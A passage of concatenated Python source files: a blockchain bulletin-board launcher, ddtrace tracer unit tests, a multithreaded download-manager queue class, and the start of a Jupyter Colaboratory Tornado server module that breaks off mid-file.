return exec_path
|
blockchain_bbs.py
|
import hashlib
import threading
import os
from blockchain import *
from network import *
from blockchain_constants import *
from time import sleep
def ensure_keys():
"""
Ensures that our public and private keys exist in the folder.
:return: None
"""
if not os.path.exists(PRIVATE_KEY_FILE):
import generate_user_key
def main(threads):
ensure_keys()
blockchain = Blockchain(LEDGER_FILE, MESSAGE_FILE, STATS_FILE)
bchain_threads = []
for i in range(threads):
bchain_threads.append(threading.Thread(target=blockchain.mine))
for thread in bchain_threads:
thread.start()
# blockchain_thread.daemon = True
server = Server(blockchain, True, True, False)
server.run()
# Main thread is server thread
# This call never returns
if __name__ == "__main__":
import sys
threads = 1
if len(sys.argv) > 1:
threads = int(sys.argv[1])
main(threads)
|
test_tracer.py
|
"""
tests for Tracer and utilities.
"""
import contextlib
import multiprocessing
from os import getpid
import warnings
from unittest.case import SkipTest
import mock
import pytest
import ddtrace
from ddtrace.ext import system
from ddtrace.context import Context
from ddtrace.constants import VERSION_KEY, ENV_KEY
from tests.subprocesstest import run_in_subprocess
from .base import BaseTracerTestCase
from .utils.tracer import DummyTracer
from .utils.tracer import DummyWriter # noqa
from ddtrace.internal.writer import LogWriter, AgentWriter
def get_dummy_tracer():
return DummyTracer()
class TracerTestCase(BaseTracerTestCase):
def test_tracer_vars(self):
span = self.trace('a', service='s', resource='r', span_type='t')
span.assert_matches(name='a', service='s', resource='r', span_type='t')
# DEV: Finish to ensure we don't leak `service` between spans
span.finish()
span = self.trace('a')
span.assert_matches(name='a', service=None, resource='a', span_type=None)
def test_tracer(self):
def _mix():
with self.trace('cake.mix'):
pass
def _bake():
with self.trace('cake.bake'):
pass
def _make_cake():
with self.trace('cake.make') as span:
span.service = 'baker'
span.resource = 'cake'
_mix()
_bake()
# let's run it and make sure all is well.
self.assert_has_no_spans()
_make_cake()
# Capture root's trace id to assert later
root_trace_id = self.get_root_span().trace_id
# Assert structure of this trace
self.assert_structure(
# Root span with 2 children
dict(name='cake.make', resource='cake', service='baker', parent_id=None),
(
# Span with no children
dict(name='cake.mix', resource='cake.mix', service='baker'),
# Span with no children
dict(name='cake.bake', resource='cake.bake', service='baker'),
),
)
# do it again and make sure it has new trace ids
self.reset()
_make_cake()
self.assert_span_count(3)
for s in self.spans:
assert s.trace_id != root_trace_id
def test_tracer_wrap(self):
@self.tracer.wrap('decorated_function', service='s', resource='r', span_type='t')
def f(tag_name, tag_value):
# make sure we can still set tags
span = self.tracer.current_span()
span.set_tag(tag_name, tag_value)
f('a', 'b')
self.assert_span_count(1)
span = self.get_root_span()
span.assert_matches(
name='decorated_function', service='s', resource='r', span_type='t', meta=dict(a='b'),
)
def test_tracer_pid(self):
with self.trace('root') as root_span:
with self.trace('child') as child_span:
pass
# Root span should contain the pid of the current process
root_span.assert_metrics({system.PID: getpid()}, exact=False)
# Child span should not contain a pid tag
child_span.assert_metrics(dict(), exact=True)
def test_tracer_wrap_default_name(self):
@self.tracer.wrap()
def f():
pass
f()
self.assert_structure(dict(name='tests.test_tracer.f'))
def test_tracer_wrap_exception(self):
@self.tracer.wrap()
def f():
raise Exception('bim')
with self.assertRaises(Exception) as ex:
f()
self.assert_structure(
dict(
name='tests.test_tracer.f',
error=1,
meta={
'error.msg': ex.message,
'error.type': ex.__class__.__name__,
},
),
)
def test_tracer_wrap_multiple_calls(self):
@self.tracer.wrap()
def f():
pass
f()
f()
self.assert_span_count(2)
assert self.spans[0].span_id != self.spans[1].span_id
def test_tracer_wrap_span_nesting_current_root_span(self):
@self.tracer.wrap('inner')
def inner():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, 'outer')
@self.tracer.wrap('outer')
def outer():
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, 'outer')
with self.trace('mid'):
root_span = self.tracer.current_root_span()
self.assertEqual(root_span.name, 'outer')
inner()
outer()
def test_tracer_wrap_span_nesting(self):
@self.tracer.wrap('inner')
def inner():
pass
@self.tracer.wrap('outer')
def outer():
with self.trace('mid'):
inner()
outer()
self.assert_span_count(3)
self.assert_structure(
dict(name='outer'),
(
(
dict(name='mid'),
(
dict(name='inner'),
)
),
),
)
def test_tracer_wrap_class(self):
class Foo(object):
@staticmethod
@self.tracer.wrap()
def s():
return 1
@classmethod
@self.tracer.wrap()
def c(cls):
return 2
@self.tracer.wrap()
def i(cls):
return 3
f = Foo()
self.assertEqual(f.s(), 1)
self.assertEqual(f.c(), 2)
self.assertEqual(f.i(), 3)
self.assert_span_count(3)
self.spans[0].assert_matches(name='tests.test_tracer.s')
self.spans[1].assert_matches(name='tests.test_tracer.c')
self.spans[2].assert_matches(name='tests.test_tracer.i')
def test_tracer_wrap_factory(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace('wrap.overwrite') as span:
span.set_tag('args', args)
span.set_tag('kwargs', kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
wrapped_function(42, kw_param=42)
self.assert_span_count(1)
self.spans[0].assert_matches(
name='wrap.overwrite',
meta=dict(args='(42,)', kwargs='{\'kw_param\': 42}'),
)
def test_tracer_wrap_factory_nested(self):
def wrap_executor(tracer, fn, args, kwargs, span_name=None, service=None, resource=None, span_type=None):
with tracer.trace('wrap.overwrite') as span:
span.set_tag('args', args)
span.set_tag('kwargs', kwargs)
return fn(*args, **kwargs)
@self.tracer.wrap()
def wrapped_function(param, kw_param=None):
self.assertEqual(42, param)
self.assertEqual(42, kw_param)
# set the custom wrap factory after the wrapper has been called
self.tracer.configure(wrap_executor=wrap_executor)
# call the function expecting that the custom tracing wrapper is used
with self.trace('wrap.parent', service='webserver'):
wrapped_function(42, kw_param=42)
self.assert_structure(
dict(name='wrap.parent', service='webserver'),
(
dict(
name='wrap.overwrite',
service='webserver',
meta=dict(args='(42,)', kwargs='{\'kw_param\': 42}')
),
),
)
def test_tracer_disabled(self):
self.tracer.enabled = True
with self.trace('foo') as s:
s.set_tag('a', 'b')
self.assert_has_spans()
self.reset()
self.tracer.enabled = False
with self.trace('foo') as s:
s.set_tag('a', 'b')
self.assert_has_no_spans()
def test_unserializable_span_with_finish(self):
try:
import numpy as np
except ImportError:
raise SkipTest('numpy not installed')
# a weird case where manually calling finish with an unserializable
# span was causing an loop of serialization.
with self.trace('parent') as span:
span.metrics['as'] = np.int64(1) # circumvent the data checks
span.finish()
def test_tracer_disabled_mem_leak(self):
# ensure that if the tracer is disabled, we still remove things from the
# span buffer upon finishing.
self.tracer.enabled = False
s1 = self.trace('foo')
s1.finish()
p1 = self.tracer.current_span()
s2 = self.trace('bar')
self.assertIsNone(s2._parent)
s2.finish()
self.assertIsNone(p1)
def test_tracer_global_tags(self):
s1 = self.trace('brie')
s1.finish()
self.assertIsNone(s1.get_tag('env'))
self.assertIsNone(s1.get_tag('other'))
self.tracer.set_tags({'env': 'prod'})
s2 = self.trace('camembert')
s2.finish()
self.assertEqual(s2.get_tag('env'), 'prod')
self.assertIsNone(s2.get_tag('other'))
self.tracer.set_tags({'env': 'staging', 'other': 'tag'})
s3 = self.trace('gruyere')
s3.finish()
self.assertEqual(s3.get_tag('env'), 'staging')
self.assertEqual(s3.get_tag('other'), 'tag')
def test_global_context(self):
# the tracer uses a global thread-local Context
span = self.trace('fake_span')
ctx = self.tracer.get_call_context()
self.assertEqual(len(ctx._trace), 1)
self.assertEqual(ctx._trace[0], span)
def test_tracer_current_span(self):
# the current span is in the local Context()
span = self.trace('fake_span')
self.assertEqual(self.tracer.current_span(), span)
def test_tracer_current_span_missing_context(self):
self.assertIsNone(self.tracer.current_span())
def test_tracer_current_root_span_missing_context(self):
self.assertIsNone(self.tracer.current_root_span())
def test_default_provider_get(self):
# Tracer Context Provider must return a Context object
# even if empty
ctx = self.tracer.context_provider.active()
self.assertTrue(isinstance(ctx, Context))
self.assertEqual(len(ctx._trace), 0)
def test_default_provider_set(self):
# The Context Provider can set the current active Context;
# this could happen in distributed tracing
ctx = Context(trace_id=42, span_id=100)
self.tracer.context_provider.activate(ctx)
span = self.trace('web.request')
span.assert_matches(name='web.request', trace_id=42, parent_id=100)
def test_default_provider_trace(self):
# Context handled by a default provider must be used
# when creating a trace
span = self.trace('web.request')
ctx = self.tracer.context_provider.active()
self.assertEqual(len(ctx._trace), 1)
self.assertEqual(span._context, ctx)
def test_start_span(self):
# it should create a root Span
span = self.start_span('web.request')
span.assert_matches(
name='web.request',
tracer=self.tracer,
_parent=None,
parent_id=None,
)
self.assertIsNotNone(span._context)
self.assertEqual(span._context._current_span, span)
def test_start_span_optional(self):
# it should create a root Span with arguments
span = self.start_span('web.request', service='web', resource='/', span_type='http')
span.assert_matches(
name='web.request',
service='web',
resource='/',
span_type='http',
)
def test_start_span_service_default(self):
span = self.start_span("")
span.assert_matches(
service=None
)
def test_start_span_service_from_parent(self):
with self.start_span("parent", service="mysvc") as parent:
child = self.start_span("child", child_of=parent)
child.assert_matches(
name="child",
service="mysvc",
)
def test_start_span_service_global_config(self):
# When no service is provided a default
with self.override_global_config(dict(service="mysvc")):
span = self.start_span("")
span.assert_matches(
service="mysvc"
)
def test_start_span_service_global_config_parent(self):
# Parent should have precedence over global config
with self.override_global_config(dict(service="mysvc")):
with self.start_span("parent", service="parentsvc") as parent:
child = self.start_span("child", child_of=parent)
child.assert_matches(
name="child",
service="parentsvc",
)
def test_start_child_span(self):
# it should create a child Span for the given parent
parent = self.start_span('web.request')
child = self.start_span('web.worker', child_of=parent)
parent.assert_matches(
name='web.request',
parent_id=None,
_context=child._context,
_parent=None,
tracer=self.tracer,
)
child.assert_matches(
name='web.worker',
parent_id=parent.span_id,
_context=parent._context,
_parent=parent,
tracer=self.tracer,
)
self.assertEqual(child._context._current_span, child)
def test_start_child_span_attributes(self):
# it should create a child Span with parent's attributes
parent = self.start_span('web.request', service='web', resource='/', span_type='http')
child = self.start_span('web.worker', child_of=parent)
child.assert_matches(name='web.worker', service='web')
def test_start_child_from_context(self):
# it should create a child span with a populated Context
root = self.start_span('web.request')
context = root.context
child = self.start_span('web.worker', child_of=context)
child.assert_matches(
name='web.worker',
parent_id=root.span_id,
trace_id=root.trace_id,
_context=root._context,
_parent=root,
tracer=self.tracer,
)
self.assertEqual(child._context._current_span, child)
def test_adding_services(self):
self.assertEqual(self.tracer._services, set())
root = self.start_span('root', service='one')
context = root.context
self.assertSetEqual(self.tracer._services, set(['one']))
self.start_span('child', service='two', child_of=context)
self.assertSetEqual(self.tracer._services, set(['one', 'two']))
def test_configure_runtime_worker(self):
# by default runtime worker not started though runtime id is set
self.assertIsNone(self.tracer._runtime_worker)
# configure tracer with runtime metrics collection
self.tracer.configure(collect_metrics=True)
self.assertIsNotNone(self.tracer._runtime_worker)
def test_configure_dogstatsd_host(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
self.tracer.configure(dogstatsd_host='foo')
assert self.tracer._dogstatsd_client.host == 'foo'
assert self.tracer._dogstatsd_client.port == 8125
# verify warnings triggered
assert len(w) == 1
assert issubclass(w[-1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert 'Use `dogstatsd_url`' in str(w[-1].message)
def test_configure_dogstatsd_host_port(self):
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always')
self.tracer.configure(dogstatsd_host='foo', dogstatsd_port='1234')
assert self.tracer._dogstatsd_client.host == 'foo'
assert self.tracer._dogstatsd_client.port == 1234
# verify warnings triggered
assert len(w) == 2
assert issubclass(w[0].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert 'Use `dogstatsd_url`' in str(w[0].message)
assert issubclass(w[1].category, ddtrace.utils.deprecation.RemovedInDDTrace10Warning)
assert 'Use `dogstatsd_url`' in str(w[1].message)
def test_configure_dogstatsd_url_host_port(self):
self.tracer.configure(dogstatsd_url='foo:1234')
assert self.tracer._dogstatsd_client.host == 'foo'
assert self.tracer._dogstatsd_client.port == 1234
def test_configure_dogstatsd_url_socket(self):
self.tracer.configure(dogstatsd_url='unix:///foo.sock')
assert self.tracer._dogstatsd_client.host is None
assert self.tracer._dogstatsd_client.port is None
assert self.tracer._dogstatsd_client.socket_path == '/foo.sock'
def test_span_no_runtime_tags(self):
self.tracer.configure(collect_metrics=False)
root = self.start_span('root')
context = root.context
child = self.start_span('child', child_of=context)
self.assertIsNone(root.get_tag('language'))
self.assertIsNone(child.get_tag('language'))
def test_only_root_span_runtime_internal_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("custom", "template", "web", "worker"):
root = self.start_span('root', span_type=span_type)
context = root.context
child = self.start_span('child', child_of=context)
self.assertEqual(root.get_tag('language'), 'python')
self.assertIsNone(child.get_tag('language'))
def test_only_root_span_runtime_external_span_types(self):
self.tracer.configure(collect_metrics=True)
for span_type in ("algoliasearch.search", "boto", "cache", "cassandra", "elasticsearch",
"grpc", "kombu", "http", "memcached", "redis", "sql", "vertica"):
root = self.start_span('root', span_type=span_type)
context = root.context
child = self.start_span('child', child_of=context)
self.assertIsNone(root.get_tag('language'))
self.assertIsNone(child.get_tag('language'))
def test_tracer_url():
t = ddtrace.Tracer()
assert t.writer.api.hostname == 'localhost'
assert t.writer.api.port == 8126
t = ddtrace.Tracer(url='http://foobar:12')
assert t.writer.api.hostname == 'foobar'
assert t.writer.api.port == 12
t = ddtrace.Tracer(url='unix:///foobar')
assert t.writer.api.uds_path == '/foobar'
t = ddtrace.Tracer(url='http://localhost')
assert t.writer.api.hostname == 'localhost'
assert t.writer.api.port == 80
assert not t.writer.api.https
t = ddtrace.Tracer(url='https://localhost')
assert t.writer.api.hostname == 'localhost'
assert t.writer.api.port == 443
assert t.writer.api.https
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(url='foo://foobar:12')
assert str(e) == 'Unknown scheme `https` for agent URL'
def test_tracer_shutdown_no_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
# The writer thread does not start until the first write.
t.shutdown()
assert not t.writer.stop.called
assert not t.writer.join.called
# Do a write to start the writer.
with t.trace("something"):
pass
t.shutdown()
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=None)
def test_tracer_shutdown_timeout():
t = ddtrace.Tracer()
t.writer = mock.Mock(wraps=t.writer)
with t.trace("something"):
pass
t.shutdown(timeout=2)
t.writer.stop.assert_called_once_with()
t.writer.join.assert_called_once_with(timeout=2)
def test_tracer_dogstatsd_url():
t = ddtrace.Tracer()
assert t._dogstatsd_client.host == 'localhost'
assert t._dogstatsd_client.port == 8125
t = ddtrace.Tracer(dogstatsd_url='foobar:12')
assert t._dogstatsd_client.host == 'foobar'
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url='udp://foobar:12')
assert t._dogstatsd_client.host == 'foobar'
assert t._dogstatsd_client.port == 12
t = ddtrace.Tracer(dogstatsd_url='/var/run/statsd.sock')
assert t._dogstatsd_client.socket_path == '/var/run/statsd.sock'
t = ddtrace.Tracer(dogstatsd_url='unix:///var/run/statsd.sock')
assert t._dogstatsd_client.socket_path == '/var/run/statsd.sock'
with pytest.raises(ValueError) as e:
t = ddtrace.Tracer(dogstatsd_url='foo://foobar:12')
assert str(e) == 'Unknown url format for `foo://foobar:12`'
def test_tracer_fork():
t = ddtrace.Tracer()
original_pid = t._pid
original_writer = t.writer
@contextlib.contextmanager
def capture_failures(errors):
try:
yield
except AssertionError as e:
errors.put(e)
def task(t, errors):
# Start a new span to trigger process checking
with t.trace('test', service='test') as span:
# Assert we recreated the writer and have a new queue
with capture_failures(errors):
assert t._pid != original_pid
assert t.writer != original_writer
assert t.writer._trace_queue != original_writer._trace_queue
# Assert the trace got written into the correct queue
assert original_writer._trace_queue.qsize() == 0
assert t.writer._trace_queue.qsize() == 1
assert [[span]] == list(t.writer._trace_queue.get())
# Assert tracer in a new process correctly recreates the writer
errors = multiprocessing.Queue()
p = multiprocessing.Process(target=task, args=(t, errors))
try:
p.start()
finally:
p.join(timeout=2)
while errors.qsize() > 0:
raise errors.get()
# Ensure writing into the tracer in this process still works as expected
with t.trace('test', service='test') as span:
assert t._pid == original_pid
assert t.writer == original_writer
assert t.writer._trace_queue == original_writer._trace_queue
# Assert the trace got written into the correct queue
assert original_writer._trace_queue.qsize() == 1
assert t.writer._trace_queue.qsize() == 1
assert [[span]] == list(t.writer._trace_queue.get())
def test_tracer_with_version():
t = ddtrace.Tracer()
# With global `config.version` defined
with BaseTracerTestCase.override_global_config(dict(version='1.2.3')):
with t.trace('test.span') as span:
assert span.get_tag(VERSION_KEY) == '1.2.3'
# override manually
span.set_tag(VERSION_KEY, '4.5.6')
assert span.get_tag(VERSION_KEY) == '4.5.6'
# With no `config.version` defined
with t.trace('test.span') as span:
assert span.get_tag(VERSION_KEY) is None
# explicitly set in the span
span.set_tag(VERSION_KEY, '1.2.3')
assert span.get_tag(VERSION_KEY) == '1.2.3'
# With global tags set
t.set_tags({VERSION_KEY: 'tags.version'})
with BaseTracerTestCase.override_global_config(dict(version='config.version')):
with t.trace('test.span') as span:
assert span.get_tag(VERSION_KEY) == 'config.version'
def test_tracer_with_env():
t = ddtrace.Tracer()
# With global `config.env` defined
with BaseTracerTestCase.override_global_config(dict(env='prod')):
with t.trace('test.span') as span:
assert span.get_tag(ENV_KEY) == 'prod'
# override manually
span.set_tag(ENV_KEY, 'prod-staging')
assert span.get_tag(ENV_KEY) == 'prod-staging'
# With no `config.env` defined
with t.trace('test.span') as span:
assert span.get_tag(ENV_KEY) is None
# explicitly set in the span
span.set_tag(ENV_KEY, 'prod-staging')
assert span.get_tag(ENV_KEY) == 'prod-staging'
# With global tags set
t.set_tags({ENV_KEY: 'tags.env'})
with BaseTracerTestCase.override_global_config(dict(env='config.env')):
with t.trace('test.span') as span:
assert span.get_tag(ENV_KEY) == 'config.env'
class EnvTracerTestCase(BaseTracerTestCase):
"""Tracer test cases requiring environment variables.
"""
@run_in_subprocess(env_overrides=dict(DATADOG_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DATADOG_SERVICE_NAME(self):
"""
When DATADOG_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE_NAME="mysvc"))
def test_service_name_legacy_DD_SERVICE_NAME(self):
"""
When DD_SERVICE_NAME is provided
It should not be used by default
It should be used with config._get_service()
"""
from ddtrace import config
assert config.service is None
with self.start_span("") as s:
s.assert_matches(service=None)
with self.start_span("", service=config._get_service()) as s:
s.assert_matches(service="mysvc")
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env(self):
span = self.start_span("")
span.assert_matches(
service="mysvc",
)
@run_in_subprocess(env_overrides=dict(DD_SERVICE="mysvc"))
def test_service_name_env_global_config(self):
# Global config should have higher precedence than the environment variable
with self.override_global_config(dict(service="overridesvc")):
span = self.start_span("")
span.assert_matches(
service="overridesvc",
)
@run_in_subprocess(env_overrides=dict(DD_VERSION="0.1.2"))
def test_version_no_global_service(self):
# Version should be set if no service name is present
with self.trace("") as span:
span.assert_matches(
meta={
VERSION_KEY: "0.1.2",
},
)
# The version will not be tagged if the service is not globally
# configured.
with self.trace("root", service="rootsvc") as root:
assert VERSION_KEY not in root.meta
with self.trace("child") as span:
assert VERSION_KEY not in span.meta
@run_in_subprocess(env_overrides=dict(DD_SERVICE="django", DD_VERSION="0.1.2"))
def test_version_service(self):
# Fleshed out example of service and version tagging
# Our app is called django, we provide DD_SERVICE=django and DD_VERSION=0.1.2
with self.trace("django.request") as root:
# Root span should be tagged
assert root.service == "django"
assert VERSION_KEY in root.meta and root.meta[VERSION_KEY] == "0.1.2"
# Child spans should be tagged
with self.trace("") as child1:
assert child1.service == "django"
assert VERSION_KEY in child1.meta and child1.meta[VERSION_KEY] == "0.1.2"
# Version should not be applied to spans of a service that isn't user-defined
with self.trace("mysql.query", service="mysql") as span:
assert VERSION_KEY not in span.meta
# Child should also not have a version
with self.trace("") as child2:
assert child2.service == "mysql"
assert VERSION_KEY not in child2.meta
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func"))
def test_detect_agentless_env(self):
assert isinstance(self.tracer.original_writer, LogWriter)
@run_in_subprocess(env_overrides=dict(AWS_LAMBDA_FUNCTION_NAME="my-func", DD_AGENT_HOST="localhost"))
def test_detect_agent_config(self):
assert isinstance(self.tracer.original_writer, AgentWriter)
|
DLManager.py
|
from .packer import Packer
import time, threading
class Manager(Packer, object):
def __init__(self):
self.tasks = {}
self.id_map = []
self.name_id = {}
self.max_task = 2
self.queue = TaskQueue()
self._insp_thr = None
self.shutdown_flag = False
self.all_pause_flag = True
self.__queue_lock__ = threading.RLock()
self._done_buff = []
def __insp__(self):
while True:
self.checkRunQueue()
if self.shutdown_flag or self.all_pause_flag:
self.checkRunQueue()
break
self.run()
if not self.queue.undone and self.isEnd():
self.checkRunQueue()
break
time.sleep(0.01)
def checkRunQueue(self):
with self.__queue_lock__:
for i in list(self.queue.run):
if self.tasks[i].isEnd():
self.tasks[i].close()
self.queue.run.remove(i)
self.queue.done.append(i)
self._done_buff.append(i)
def getHandler(self, name=None, id=None):
if name is None and id is None:
return None
if id is not None:
return self.tasks[id]
if name is not None:
return self.tasks[self.getIdFromName(name)]
def getAllTask(self):
return self.tasks
def getRunQueue(self):
return self.queue.run
def getPauseQueue(self):
return self.queue.pause
def getDoneQueue(self):
return self.queue.done
def getUndoneQueue(self):
return self.queue.undone
def getIdFromName(self, name):
return self.name_id[name]
def getNameFromId(self, id):
for i, j in self.name_id.items():
if id == j:
return i
def addHandler(self, Handler, name=None):
with self.__queue_lock__:
id = self.newId()
name = id if not name else name
self.tasks[id] = Handler
self.name_id[name] = id
self.id_map[id] = True
self.queue.undone.append(id)
return id
def newId(self):
for i, j in enumerate(self.id_map):
if not j:
return i
else:
self.id_map.append(False)
return len(self.id_map) - 1
def remove(self, id):
with self.__queue_lock__:
del self.tasks[id]
self.id_map[id] = False
del self.name_id[self.getIdFromName(id)]
def run(self, id=None):
with self.__queue_lock__:
self.all_pause_flag = False
if not self._insp_thr or not self._insp_thr.isAlive():
self._insp_thr = threading.Thread(target=self.__insp__, name='Nbdler-Manager')
self._insp_thr.start()
if id is not None:
if len(self.queue.run) < self.max_task:
self.tasks[id].run()
self.queue.run.append(id)
else:
for i in list(self.queue.undone):
if len(self.queue.run) < self.max_task:
# if not self.tasks[i].isEnd():
self.tasks[i].run()
self.queue.run.append(i)
if i in self.queue.pause:
self.queue.pause.remove(i)
self.queue.undone.remove(i)
def pause(self, id=None):
self._done_buff = []
if id is not None:
self.tasks[id].pause()
with self.__queue_lock__:
if id in self.queue.run:
self.queue.run.remove(id)
if id not in self.queue.pause:
self.queue.pause.append(id)
else:
self.all_pause_flag = True
self._insp_thr.join()
with self.__queue_lock__:
for i in list(self.getRunQueue()):
threading.Thread(target=self.tasks[i].pause).start()
if i in self.queue.run:
self.queue.run.remove(i)
if i not in self.queue.pause:
self.queue.pause.append(i)
self.checkRunQueue()
def shutdown(self):
self._done_buff = []
self.shutdown_flag = True
if self._insp_thr:
self._insp_thr.join()
for i in self.tasks.values():
threading.Thread(target=i.shutdown).start()
def close(self):
pass
def join(self):
if not self._insp_thr:
if not self.isEnd():
self.run()
else:
return
# raise RuntimeError('cannot join thread before it is started')
self._insp_thr.join()
for i in self.tasks.values():
i.join()
def getAvgSpeed(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getAvgSpeed()
speed = 0
for i in self.queue.run:
if not self.tasks[i].isEnd():
speed += self.tasks[i].getAvgSpeed()
return speed
def getInsSpeed(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getInsSpeed()
speed = 0
for i in self.queue.run:
speed += self.tasks[i].getInsSpeed()
for i in list(self._done_buff):
tmp = self.tasks[i].getInsSpeed()
speed += tmp
if tmp < 100:
self._done_buff.remove(i)
# self._done_buff = []
return speed
def getIncByte(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getIncByte()
inc = 0
for i in self.queue.done:
inc += self.tasks[i].getFileSize()
for i in self.queue.run:
dl = self.tasks[i]
inc += dl.getFileSize() - dl.getLeft()
return inc
def getFileSize(self, id=None):
if id is not None:
return self.tasks[id].getFileSize()
return self.getTotalSize()
def getTotalSize(self):
size = 0
for i, j in self.tasks.items():
size += j.getFileSize()
return size
def getLeft(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].getLeft()
left = 0
for i in self.queue.run:
if not self.tasks[i].isEnd():
left += self.tasks[i].getLeft()
for i in self.queue.undone:
left += self.tasks[i].getLeft()
return left
def isEnd(self, id=None):
with self.__queue_lock__:
if id is not None:
return self.tasks[id].isEnd()
for i in self.queue.run:
if not self.tasks[i].isEnd():
break
else:
return True if not self.queue.undone else False
return False
def config(self, **kwargs):
for i, j in self.__config_params__():
if i in kwargs:
setattr(self, j, kwargs[i])
def __config_params__(self):
return [('max_task', 'max_task')]
def __packet_params__(self):
return ['tasks', 'max_task']
def unpack(self, packet):
Packer.unpack(self, packet)
class TaskQueue(object):
def __init__(self):
self.run = []
self.pause = []
self.undone = []
self.done = []
self.ready = []
|
colaboratory.py
|
# coding: utf-8
"""Colaboratory: the Jupyter Collaborative Computational Laboratory.
"""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
import errno
import json
import logging
import os
import random
import select
import signal
import socket
import sys
import threading
import webbrowser
# check for pyzmq 2.1.11
from IPython.utils.zmqrelated import check_for_zmq
check_for_zmq('2.1.11', 'IPython.html')
from jinja2 import Environment, FileSystemLoader
# Install the pyzmq ioloop. This has to be done before anything else from
# tornado is imported.
from zmq.eventloop import ioloop
ioloop.install()
# check for tornado 3.1.0
msg = "The Jupyter Colaboratory requires tornado >= 3.1.0"
try:
import tornado
except ImportError:
raise ImportError(msg)
try:
version_info = tornado.version_info
except AttributeError:
raise ImportError(msg + ", but you have < 1.1.0")
if version_info < (3,1,0):
raise ImportError(msg + ", but you have %s" % tornado.version)
from tornado import httpserver
from tornado import web
from tornado.log import LogFormatter
from IPython.html import DEFAULT_STATIC_FILES_PATH
from IPython.html.log import log_request
from IPython.html.services.kernels.kernelmanager import MappingKernelManager
from IPython.html.base.handlers import (FileFindHandler, IPythonHandler)
from IPython.config.application import catch_config_error
from IPython.core.application import (
BaseIPythonApplication, base_flags, base_aliases,
)
from IPython.core.profiledir import ProfileDir
from IPython.kernel import KernelManager
from IPython.kernel.zmq.session import default_secure, Session
from IPython.utils.importstring import import_item
from IPython.utils import submodule
from IPython.utils.traitlets import (
Dict, Unicode, Integer, List, Bool, Bytes,
DottedObjectName,
)
#-----------------------------------------------------------------------------
# Module globals
#-----------------------------------------------------------------------------
pjoin = os.path.join
here = os.path.dirname(__file__)
RESOURCES = pjoin(here, 'resources')
_examples = """
colab # start the server
colab --profile=sympy # use the sympy profile
"""
#-----------------------------------------------------------------------------
# Helper functions
#-----------------------------------------------------------------------------
def random_ports(port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def load_handlers(name):
"""Load the (URL pattern, handler) tuples for each component."""
name = 'IPython.html.' + name
mod = __import__(name, fromlist=['default_handlers'])
return mod.default_handlers
#-----------------------------------------------------------------------------
# The Tornado web application
#-----------------------------------------------------------------------------
class SingleStaticFileHandler(web.StaticFileHandler):
def get_absolute_path(self, root, path):
p = os.path.abspath(os.path.join(self.root, self.default_filename))
return p
class NotebookHandler(IPythonHandler):
def get(self, path='', name=None):
self.write(self.render_template('notebook.html',
raw='1',
app_mode=False))
class WelcomeHandler(IPythonHandler):
def get(self, path='', name=None):
self.write(self.render_template('welcome.html',
raw='1',
app_mode=False))
class ColaboratoryWebApplication(web.Application):
def __init__(self, ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options):
settings = self.init_settings(
ipython_app, kernel_manager, notebook_manager,
session_manager, log,
settings_overrides, jinja_env_options)
handlers = self.init_handlers(settings)
super(ColaboratoryWebApplication, self).__init__(handlers, **settings)
def init_settings(self, ipython_app, kernel_manager, notebook_manager,
session_manager,
log, settings_overrides,
jinja_env_options=None):
template_path = settings_overrides.get("template_path", os.path.join(RESOURCES, "colab"))
jenv_opt = jinja_env_options if jinja_env_options else {}
env = Environment(loader=FileSystemLoader(template_path),**jenv_opt )
settings = dict(
# basics
log_function=log_request,
base_url='/',
template_path=template_path,
# authentication
cookie_secret=ipython_app.cookie_secret,
login_url='/login',
password=ipython_app.password,
# managers
kernel_manager=kernel_manager,
notebook_manager=notebook_manager,
session_manager=session_manager,
# IPython stuff
config=ipython_app.config,
jinja2_env=env,
)
# allow custom overrides for the tornado web app.
settings.update(settings_overrides)
return settings
def init_handlers(self, settings):
# Load the (URL pattern, handler) tuples for each component.
here = os.path.dirname(__file__)
colab = pjoin(RESOURCES, 'colab')
handlers = [(r'/', web.RedirectHandler, {'url':'/welcome'}),
(r'/welcome(/?)', WelcomeHandler, {}),
(r'/notebook(/?)', NotebookHandler, {}),
(r'/colab/(.*)', web.StaticFileHandler,
{'path': colab}),
(r'/extern/(.*)', web.StaticFileHandler,
{'path': pjoin(RESOURCES, 'extern')}),
(r'/closure/(.*)', web.StaticFileHandler,
